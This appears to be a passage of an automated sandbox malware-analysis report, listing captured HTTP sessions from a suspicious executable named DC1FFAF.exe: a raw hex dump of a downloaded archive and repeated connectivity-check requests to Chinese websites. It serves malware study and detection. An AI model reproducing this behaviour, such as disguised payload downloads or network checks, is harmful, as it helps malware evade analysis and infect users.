                                                                                                                                    Data Raw: 50 4b 03 04 14 00 01 00 08 00 91 5d 05 59 22 5d 47 ae 1b 5b 1f 00 00 66 48 00 09 00 00 00 31 31 31 33 33 2e 72 61 72 b6 3f dc 6d cc f0 a6 b5 9b ee 35 4d 4d 44 53 8a 8f 2b ef 70 91 6c a0 f9 c5 e2 74 5a b3 b2 7f 94 43 94 a8 8b 4e 0c fe eb c7 ef 75 90 c8 55 4a f1 b6 a0 ef f7 3a 33 88 e8 90 0a 95 3b dc b7 a1 a0 5c 57 50 0e dc 2a 75 70 e4 16 4d d3 e1 5e 7f e1 54 49 5e 0c 38 da c5 cc 67 11 df e1 45 26 c9 01 3b e0 dd ad 92 fe 6b 08 fc 31 a5 6b df 63 b0 bd 99 7b e7 53 a2 c1 e7 83 01 d0 6d e5 80 37 1f 2a 79 f2 70 2c e0 d3 30 60 4d 05 71 15 6e 1a ec f4 27 d3 d8 f2 42 f7 53 bd c7 78 06 5f f5 19 09 12 08 84 2d 16 e1 77 dd 5a 7e 2e de 6e 3b ad 32 7b 0c 01 32 52 c6 a0 1f ec e9 cf 34 42 90 4b c9 82 b4 94 82 0a 8d 8a b1 92 a9 48 24 f5 fd 55 17 77 ae c0 a7 d2 5e 8f ae e2 88 ce 3e f2 7b ae 1f 02 0d 4a 31 24 df db e5 9a f2 00 7d 15 92 a0 84 b9 a5 9b d8 bd 94 0e a7 84 ec 5f 8c d1 d8 b0 23 34 6f 8b 5a 63 1f 3f 9c a2 c6 2d 19 6f 04 fd a7 6f 1d f3 e3 fe 4a 6b e8 bf 24 03 c1 3d fc 47 12 03 1a f3 a4 cb da 21 8b 75 cf bd b8 [TRUNCATED]
                                                                                                                                    Data Ascii: PK]Y"]G[fH11133.rar?m5MMDS+pltZCNuUJ:3;\WP*upM^TI^8gE&;k1kc{Sm7*yp,0`Mqn'BSx_-wZ~.n;2{2R4BKH$Uw^>{J1$}_#4oZc?-ooJk$=G!u#l*6-2Ez0|E'7i8>o'}^^*$lH,7jm=P$]<5;cs]_5@#p2&ltRd~r~W%"FGZ>rv=`O
                                                                                                                                    Aug 6, 2024 10:29:35.410988092 CEST153INData Raw: 41 57 3f ee 1a f4 b0 7f e0 b1 34 35 f9 e8 ec 04 45 14 f2 83 b1 5d 47 80 29 be 80 04 e9 a6 2b 1f e3 2a 94 19 83 27 49 27 4e 6e db 05 43 b0 50 d0 3c ff 41 20 bb 5f 75 4a c5 8e 4d e2 50 6a 1f bc 76 bf 62 e4 2f ec 36 5f 27 bc ac b6 90 d1 7a 51 88 f8
                                                                                                                                    Data Ascii: AW?45E]G)+*'I'NnCP<A _uJMPjvb/6_'zQ&-(8N)%(Bzk(5[kx?QVI9}H\U
                                                                                                                                    Aug 6, 2024 10:29:35.411001921 CEST1236INData Raw: 10 58 f9 b1 35 55 b9 3c 9c 55 b2 4c df 7c 5d 7c 01 36 89 13 23 c3 57 1f 40 32 37 de a5 2c 49 ee 23 19 ff 6e 35 6f e1 57 93 98 5b fe 74 c0 04 62 86 7b 9a 04 82 5b db 57 0f 25 69 ce b6 52 5e 4c 97 af b0 e4 ee 41 f3 31 ce 4b d4 8d b9 ee 1c bf 0e 83
                                                                                                                                    Data Ascii: X5U<UL|]|6#W@27,I#n5oW[tb{[W%iR^LA1KR\De?7r<4TnQ^0wD*-n"M`#U}#W"T<r(v\^:c#8>^+pt!C0\~){/Kt5)IkUit6G[
                                                                                                                                    Aug 6, 2024 10:29:35.411015987 CEST1236INData Raw: 1a 22 ae 80 67 25 04 44 17 2c 88 2b 89 9e 6a 11 a1 df cb 3e ab e2 c2 23 97 cc 78 22 93 69 e2 c6 b4 62 7a ae 4a 24 f8 f5 0a 5d 98 2a 59 7c 30 40 6d 1e 2d b0 06 a4 ba 6a 67 db b1 fb 78 b2 39 06 f0 50 a4 43 60 66 13 d1 28 83 05 df eb a5 ca 7d db 8e
                                                                                                                                    Data Ascii: "g%D,+j>#x"ibzJ$]*Y|0@m-jgx9PC`f(}f?['i%_wi8_r_?>_A\`P;~uw?SD~g9^y(fk2 lT8onu g`uBjuE)MOD:="(;
                                                                                                                                    Aug 6, 2024 10:29:35.411031008 CEST1236INData Raw: a8 08 22 4c 2e fd e8 11 22 45 90 53 4a 3a 31 5d fa 8e 50 17 5c ce 0c 72 ac c8 ab 5a 38 50 12 f4 1d 22 96 21 71 b0 bb fb 74 46 e4 72 a9 89 4a 31 84 82 0d 43 55 26 e6 d7 9e 4b 80 f7 f0 95 ce 83 f0 a7 91 e2 1e b5 ca 2b de 4e 3c 27 e5 9f ab 60 9d 6a
                                                                                                                                    Data Ascii: "L."ESJ:1]P\rZ8P"!qtFrJ1CU&K+N<'`jZ'M/G%c7!w^pYST)T/d"xdOf0GFCl_Fs bj;7Ci]'J'1*$d=:&X RJi7?-7Kv^,2
                                                                                                                                    Aug 6, 2024 10:29:35.411048889 CEST1236INData Raw: f6 17 07 86 56 31 e2 e9 72 ba 01 ae 36 a2 ae 09 dc e8 84 e0 06 61 f4 2c 63 6b 21 57 ef eb b4 99 e8 3a 44 5d b9 25 88 c4 5d 2f c6 61 19 b2 8c 0f 1e 73 f5 44 b0 30 ab e4 94 f7 9d 6f 1a 95 5a f0 04 b9 80 1e 8d 7d 34 3b 34 a6 e9 09 a4 c0 77 e6 8e 21
                                                                                                                                    Data Ascii: V1r6a,ck!W:D]%]/asD0oZ}4;4w![0eE!4F[u0GNcQ !)c<[D`R<FFxfu1l#b~o;LA,kh`v=\}MNFE{9{*`AY\H9%ec
                                                                                                                                    Aug 6, 2024 10:29:35.411078930 CEST1236INData Raw: a8 6b a4 9c aa a3 a4 29 46 83 fa 1d 57 79 51 91 d6 54 1f 50 a3 0e fe 01 2d 7f d4 da fb 33 b1 29 32 d8 48 de ab d8 8e 12 a8 61 9f 86 53 28 03 07 42 dd 2b 2e 37 bb 37 de e1 cf 99 d1 51 b3 bd 5c 7b c8 1e 1a 20 40 23 44 4c 0f 86 18 98 d1 4b 61 ca 84
                                                                                                                                    Data Ascii: k)FWyQTP-3)2HaS(B+.77Q\{ @#DLKaXn[KA$pF Us^|z5IqN^S@E9):{HeZ9WB#f$US:B2o7vPve{xix&qi%{hW[=b+\Z
                                                                                                                                    Aug 6, 2024 10:29:35.411091089 CEST860INData Raw: 79 31 58 da 3b ba 38 a4 85 d6 37 e0 94 dd 30 03 cf 4e bb f0 04 9b 09 47 75 d5 4c 27 83 21 1f cf 85 0c 99 b1 1a 2f 4e 2e 30 30 83 04 45 4a 68 c9 82 8d 2c 95 54 49 f0 5d f7 0f 8d af 5e 9f d3 0a 0f c7 05 21 5f 65 41 df d6 d8 58 af b5 b0 be de fe 26
                                                                                                                                    Data Ascii: y1X;870NGuL'!/N.00EJh,TI]^!_eAX&9_AgsiIcE;$XR@T1|MB{*e6=8b!$P>9SGX8LWY22f1=vEN46`]t>1=\MTG];oR6-3%"F
                                                                                                                                    Aug 6, 2024 10:29:35.411102057 CEST1236INData Raw: 7b cd d5 9b 34 3d 19 12 f9 23 77 dd aa 6f 3a 4c d3 aa 77 a9 b3 56 10 e2 41 80 5f 76 fc 9f d3 bc 6a 97 2e c1 4c 0b d5 26 04 24 51 96 f6 7c 92 f1 b7 45 34 d8 2b 3f 3d fb a6 da e7 7b 47 6f 3d 22 53 68 8d 34 f2 d7 24 e3 06 f8 4a 13 63 32 7d d7 49 dd
                                                                                                                                    Data Ascii: {4=#wo:LwVA_vj.L&$Q|E4+?={Go="Sh4$Jc2}Irs3}lfd|en%DokuQ`[m1F460.=Ky xVStgmL..U}S5| 4dBf$;*}:\.M++m
                                                                                                                                    Aug 6, 2024 10:29:35.411113024 CEST1236INData Raw: c5 6a ba ce 7f c1 ea 2f 6e 5e ce 6f b0 56 8b 91 0e 9f 91 55 76 7b 05 e2 c4 95 c8 16 b1 e6 94 2a 2e aa 3a be 17 9d c0 79 1a cd 9b 24 99 a6 c0 11 0a 9e 1d 26 67 be 81 f3 20 c7 27 36 7b fa bd 57 18 70 39 d3 94 bd 1d 8a df b8 1f 0f 44 6e bc cb a2 e1
                                                                                                                                    Data Ascii: j/n^oVUv{*.:y$&g '6{Wp9Dn)dt|IL3/%$aRU^w?kLM_?<p!`+i^]>\Wxcl&VPV01D8uS_*T#kkf&Ol7_ G
                                                                                                                                    Aug 6, 2024 10:29:35.416002989 CEST1236INData Raw: bd d2 03 8f bf 4d 5e b6 1e 9f ad 4f 6c 79 35 dd 4f 64 19 67 33 41 72 56 71 20 60 9e 52 d5 b1 1f b3 5a 5b 31 2e a6 c2 4f 78 d2 b9 37 7c ce 32 73 2d 42 cc 06 6b df 36 8e 72 79 58 39 9a 52 c9 c4 13 ba d2 97 9a 7d 1a 7e 46 2b 9b 5e a5 2e 86 35 66 9f
                                                                                                                                    Data Ascii: M^Oly5Odg3ArVq `RZ[1.Ox7|2s-Bk6ryX9R}~F+^.5f1\fDIzAoHP_l]c56h=2/43`tQLH`/S_6q"3s_3rPDSFX(vuS0Q`oz@\TG(P2;Yts#kZ


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    29192.168.2.649753103.107.217.2680420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:30:00.756186008 CEST222OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.kuaishou.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:30:03.987652063 CEST425INHTTP/1.1 307 Temporary Redirect
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:03 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 218
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://www.kuaishou.com/
                                                                                                                                    X-KSClient-IP: 8.46.123.33
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>tuser</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    30192.168.2.649755119.28.109.13280420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:30:00.933664083 CEST219OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.sogou.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:30:02.203993082 CEST564INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:01 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Set-Cookie: ABTEST=6|1722933001|v17; expires=Thu, 05-Sep-24 08:30:01 GMT; path=/
                                                                                                                                    P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                    Location: https://www.sogou.com/
                                                                                                                                    UUID: c52a32a4-4b12-47a9-912c-168a3b3baaab
                                                                                                                                    Data Raw: 38 61 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 8a<html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>0
                                                                                                                                    Aug 6, 2024 10:30:02.206199884 CEST564INHTTP/1.1 302 Moved Temporarily
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:01 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Set-Cookie: ABTEST=6|1722933001|v17; expires=Thu, 05-Sep-24 08:30:01 GMT; path=/
                                                                                                                                    P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                    Location: https://www.sogou.com/
                                                                                                                                    UUID: c52a32a4-4b12-47a9-912c-168a3b3baaab
                                                                                                                                    Data Raw: 38 61 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 8a<html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    31192.168.2.649756163.181.160.23580420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:30:01.020503998 CEST220OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.douyin.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:30:02.203533888 CEST590INHTTP/1.1 301 Moved Permanently
                                                                                                                                    Server: Tuser
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:01 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 262
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://www.douyin.com/
                                                                                                                                    x-tt-trace-tag: id=03;cdn-cache=miss;type=dyn
                                                                                                                                    Via: ens-cache10.sg17[,0]
                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                    EagleId: a3b5a09e17229330017948270e
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 68 61 73 20 62 65 65 6e 20 61 73 73 69 67 6e 65 64 20 61 20 6e 65 77 20 70 65 72 6d 61 6e 65 6e 74 20 55 52 49 2e 3c 2f 70 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>301 Moved Permanently</h1><p>The requested resource has been assigned a new permanent URI.</p><hr/>Powered by Tuser</body></html>
                                                                                                                                    Aug 6, 2024 10:30:02.206144094 CEST590INHTTP/1.1 301 Moved Permanently
                                                                                                                                    Server: Tuser
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:01 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 262
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://www.douyin.com/
                                                                                                                                    x-tt-trace-tag: id=03;cdn-cache=miss;type=dyn
                                                                                                                                    Via: ens-cache10.sg17[,0]
                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                    EagleId: a3b5a09e17229330017948270e
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 68 61 73 20 62 65 65 6e 20 61 73 73 69 67 6e 65 64 20 61 20 6e 65 77 20 70 65 72 6d 61 6e 65 6e 74 20 55 52 49 2e 3c 2f 70 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>301 Moved Permanently</h1><p>The requested resource has been assigned a new permanent URI.</p><hr/>Powered by Tuser</body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    32192.168.2.64975843.159.71.11880420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:30:01.112170935 CEST218OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.sohu.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:30:02.204174042 CEST225INHTTP/1.1 302 Found
                                                                                                                                    Location: https://www.sohu.com/
                                                                                                                                    Content-Length: 0
                                                                                                                                    X-NWS-LOG-UUID: 2830820919943397086
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Server: OverSea_E0
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:01 GMT
                                                                                                                                    X-Cache-Lookup: Return Directly
                                                                                                                                    Aug 6, 2024 10:30:02.234812021 CEST225INHTTP/1.1 302 Found
                                                                                                                                    Location: https://www.sohu.com/
                                                                                                                                    Content-Length: 0
                                                                                                                                    X-NWS-LOG-UUID: 2830820919943397086
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Server: OverSea_E0
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:01 GMT
                                                                                                                                    X-Cache-Lookup: Return Directly


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    33192.168.2.64975943.152.186.10380420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:30:01.165488005 CEST216OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.qq.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:30:02.204260111 CEST368INHTTP/1.1 302 Found
                                                                                                                                    Server: stgw
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Location: https://www.qq.com/
                                                                                                                                    Content-Length: 137
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:01 GMT
                                                                                                                                    EO-LOG-UUID: 5492558336285946922
                                                                                                                                    EO-Cache-Status: MISS
                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 73 74 67 77 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>stgw</center></body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    34192.168.2.649760163.181.42.23980420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:30:01.227648973 CEST221OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.sina.com.cn
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:30:02.206116915 CEST581INHTTP/1.1 302 Found
                                                                                                                                    Server: Tuser
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:02 GMT
                                                                                                                                    Content-Type: text/html
                                                                                                                                    Content-Length: 242
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Location: https://www.sina.com.cn/
                                                                                                                                    X-DSL-CHECK: 5
                                                                                                                                    X-Via-CDN: f=aliyun,s=ens-cache3.sg27,c=8.46.123.33;
                                                                                                                                    Via: ens-cache3.sg27[,0]
                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                    EagleId: a3b52a9717229330020046569e
                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 72 65 73 69 64 65 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 64 65 72 20 61 20 64 69 66 66 65 72 65 6e 74 20 55 52 49 2e 3c 2f 70 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>302 Found</h1><p>The requested resource resides temporarily under a different URI.</p><hr/>Powered by Tuser</body></html>


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    35192.168.2.649761103.235.46.9680420C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    Aug 6, 2024 10:30:01.234885931 CEST219OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Language: zh-CN
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: www.baidu.com
                                                                                                                                    Range: bytes=0-
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Aug 6, 2024 10:30:02.640244007 CEST1236INHTTP/1.1 200 OK
                                                                                                                                    Bdpagetype: 1
                                                                                                                                    Bdqid: 0xc124b4a900ed711f
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Content-Encoding: gzip
                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                    Date: Tue, 06 Aug 2024 08:30:02 GMT
                                                                                                                                    P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                    P3p: CP=" OTI DSP COR IVA OUR IND COM "
                                                                                                                                    Server: BWS/1.1
                                                                                                                                    Set-Cookie: BAIDUID=D17EA119710710AE58EBB90B38072B15:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
                                                                                                                                    Set-Cookie: BIDUPSID=D17EA119710710AE58EBB90B38072B15; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
                                                                                                                                    Set-Cookie: PSTM=1722933002; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com
                                                                                                                                    Set-Cookie: BAIDUID=D17EA119710710AE36C42AF8DCF7CF08:FG=1; max-age=31536000; expires=Wed, 06-Aug-25 08:30:02 GMT; domain=.baidu.com; path=/; version=1; comment=bd
                                                                                                                                    Set-Cookie: BDSVRTM=46; path=/
                                                                                                                                    Set-Cookie: BD_HOME=1; path=/
                                                                                                                                    Traceid: 1722933002376957953013917447386439708959
                                                                                                                                    X-Ua-Compatible: IE=Edge,chrome=1
                                                                                                                                    X-Xss-Protection: 1;mode=block
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Data Raw: 62 64 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 69 93 1c 4b 72 18 f8 1d bf a2 d8 6d 43 00 53 5d f7 dd 18 3c b2 4f a0 71 74 17 fa 00 1a cd 37 db 96 95 95 59 55 e8 ba ba b2 aa fa 12 cc 48 69 47 94 56 cb cb 68 92 6c 45 ae 76 49 33 ad ed 9a ed 0e 29 5b 6a c5 25 45 f2 c7 68 de 9b 99 4f fb 17 d6 dd 23 22 33 ae ac a3 d1 20 25 33 bd 7a 00 aa 32 e3 f0 f0 f0 f0 f0 f0 2b 7e f4 2b db 07 5b c7 1f eb 3b 89 f6 b8 d7 fd e6 47 bf 92 4a 1d 1d 6f 1c 9f 1c 25 0e 5e a7 52 df fc 88 3d 6d 7b 4e f3 9b 1f f5 bc b1 03 c5 c6 c3 94 77 39 e9 4c 9f af 6c 0d fa 63 af 3f
